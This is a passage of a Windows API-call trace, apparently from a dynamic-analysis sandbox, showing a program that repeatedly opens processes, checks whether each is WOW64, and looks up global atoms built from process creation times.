	[0108.654] CloseHandle (hObject=0x694) returned 1
	[0108.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0108.654] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.654] CloseHandle (hObject=0x694) returned 1
	[0108.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0108.654] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.654] CloseHandle (hObject=0x694) returned 1
	[0108.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0108.655] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.655] CloseHandle (hObject=0x694) returned 1
	[0108.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0108.655] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.655] CloseHandle (hObject=0x694) returned 1
	[0108.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0108.655] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.655] CloseHandle (hObject=0x694) returned 1
	[0108.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0108.655] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.655] CloseHandle (hObject=0x694) returned 1
	[0108.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0108.656] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.656] CloseHandle (hObject=0x694) returned 1
	[0108.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0108.656] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.656] CloseHandle (hObject=0x694) returned 1
	[0108.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0108.656] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.656] CloseHandle (hObject=0x694) returned 1
	[0108.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0108.656] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.656] CloseHandle (hObject=0x694) returned 1
	[0108.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0108.656] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.656] CloseHandle (hObject=0x694) returned 1
	[0108.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0108.657] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.657] CloseHandle (hObject=0x694) returned 1
	[0108.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0108.657] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.657] CloseHandle (hObject=0x694) returned 1
	[0108.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0108.658] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.658] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0108.658] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0108.658] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0108.658] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.659] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0108.659] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.659] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0108.659] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0108.659] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0108.659] CloseHandle (hObject=0x694) returned 1
	[0108.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0108.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0108.660] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.660] CloseHandle (hObject=0x694) returned 1
	[0108.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0108.660] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.660] CloseHandle (hObject=0x694) returned 1
	[0108.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0108.660] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.660] CloseHandle (hObject=0x694) returned 1
	[0108.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0108.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0108.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0108.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0108.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0108.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0108.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0108.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0108.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0108.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0108.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0108.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0108.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0108.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0108.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0108.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0108.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0108.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0108.812] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0108.812] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.812] CloseHandle (hObject=0x694) returned 1
	[0108.812] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0108.812] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0108.812] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0108.812] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.812] CloseHandle (hObject=0x694) returned 1
	[0108.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0108.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0108.813] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.813] CloseHandle (hObject=0x694) returned 1
	[0108.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0108.813] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.813] CloseHandle (hObject=0x694) returned 1
	[0108.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0108.813] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.813] CloseHandle (hObject=0x694) returned 1
	[0108.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0108.813] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.813] CloseHandle (hObject=0x694) returned 1
	[0108.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0108.814] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.814] CloseHandle (hObject=0x694) returned 1
	[0108.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0108.814] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.814] CloseHandle (hObject=0x694) returned 1
	[0108.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0108.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0108.814] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.814] CloseHandle (hObject=0x694) returned 1
	[0108.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0108.827] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.827] CloseHandle (hObject=0x694) returned 1
	[0108.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0108.827] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.827] CloseHandle (hObject=0x694) returned 1
	[0108.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0108.827] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.827] CloseHandle (hObject=0x694) returned 1
	[0108.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0108.828] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.828] CloseHandle (hObject=0x694) returned 1
	[0108.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0108.828] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.828] CloseHandle (hObject=0x694) returned 1
	[0108.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0108.828] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.828] CloseHandle (hObject=0x694) returned 1
	[0108.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0108.828] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.828] CloseHandle (hObject=0x694) returned 1
	[0108.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0108.829] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.829] CloseHandle (hObject=0x694) returned 1
	[0108.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0108.829] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.829] CloseHandle (hObject=0x694) returned 1
	[0108.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0108.829] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.829] CloseHandle (hObject=0x694) returned 1
	[0108.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0108.829] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.829] CloseHandle (hObject=0x694) returned 1
	[0108.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0108.829] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.829] CloseHandle (hObject=0x694) returned 1
	[0108.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0108.830] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.830] CloseHandle (hObject=0x694) returned 1
	[0108.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0108.830] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.830] CloseHandle (hObject=0x694) returned 1
	[0108.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0108.830] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.830] CloseHandle (hObject=0x694) returned 1
	[0108.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0108.830] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.830] CloseHandle (hObject=0x694) returned 1
	[0108.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0108.831] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.831] CloseHandle (hObject=0x694) returned 1
	[0108.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0108.831] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.831] CloseHandle (hObject=0x694) returned 1
	[0108.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0108.831] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.831] CloseHandle (hObject=0x694) returned 1
	[0108.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0108.831] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.831] CloseHandle (hObject=0x694) returned 1
	[0108.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0108.831] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.832] CloseHandle (hObject=0x694) returned 1
	[0108.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0108.832] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.832] CloseHandle (hObject=0x694) returned 1
	[0108.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0108.832] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.832] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0108.832] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0108.833] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0108.833] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.833] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0108.833] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.834] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0108.834] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0108.834] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0108.893] CloseHandle (hObject=0x694) returned 1
	[0108.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0108.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0108.893] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.893] CloseHandle (hObject=0x694) returned 1
	[0108.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0108.893] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.893] CloseHandle (hObject=0x694) returned 1
	[0108.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0108.894] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.894] CloseHandle (hObject=0x694) returned 1
	[0108.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0108.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0108.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0108.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0108.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0108.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0108.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0108.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0108.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0108.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0108.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0108.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0108.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0108.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0108.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0108.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0108.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0108.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0108.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0108.953] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.953] CloseHandle (hObject=0x694) returned 1
	[0108.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0108.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0108.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0108.953] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.954] CloseHandle (hObject=0x694) returned 1
	[0108.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0108.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0108.954] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.954] CloseHandle (hObject=0x694) returned 1
	[0108.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0108.954] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.954] CloseHandle (hObject=0x694) returned 1
	[0108.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0108.954] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.954] CloseHandle (hObject=0x694) returned 1
	[0108.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0108.955] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.955] CloseHandle (hObject=0x694) returned 1
	[0108.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0108.955] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.955] CloseHandle (hObject=0x694) returned 1
	[0108.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0108.955] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.955] CloseHandle (hObject=0x694) returned 1
	[0108.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0108.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0108.956] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.956] CloseHandle (hObject=0x694) returned 1
	[0108.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0108.956] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.956] CloseHandle (hObject=0x694) returned 1
	[0108.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0108.956] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.956] CloseHandle (hObject=0x694) returned 1
	[0108.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0108.956] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.956] CloseHandle (hObject=0x694) returned 1
	[0108.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0108.956] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.957] CloseHandle (hObject=0x694) returned 1
	[0108.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0108.957] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.957] CloseHandle (hObject=0x694) returned 1
	[0108.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0108.957] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.957] CloseHandle (hObject=0x694) returned 1
	[0108.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0108.957] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.957] CloseHandle (hObject=0x694) returned 1
	[0108.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0108.958] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.958] CloseHandle (hObject=0x694) returned 1
	[0108.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0108.958] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.958] CloseHandle (hObject=0x694) returned 1
	[0108.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0108.958] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.958] CloseHandle (hObject=0x694) returned 1
	[0108.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0108.958] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.958] CloseHandle (hObject=0x694) returned 1
	[0108.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0108.958] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.958] CloseHandle (hObject=0x694) returned 1
	[0108.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0108.959] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.959] CloseHandle (hObject=0x694) returned 1
	[0108.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0108.959] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.959] CloseHandle (hObject=0x694) returned 1
	[0108.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0108.959] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.959] CloseHandle (hObject=0x694) returned 1
	[0108.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0108.959] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.959] CloseHandle (hObject=0x694) returned 1
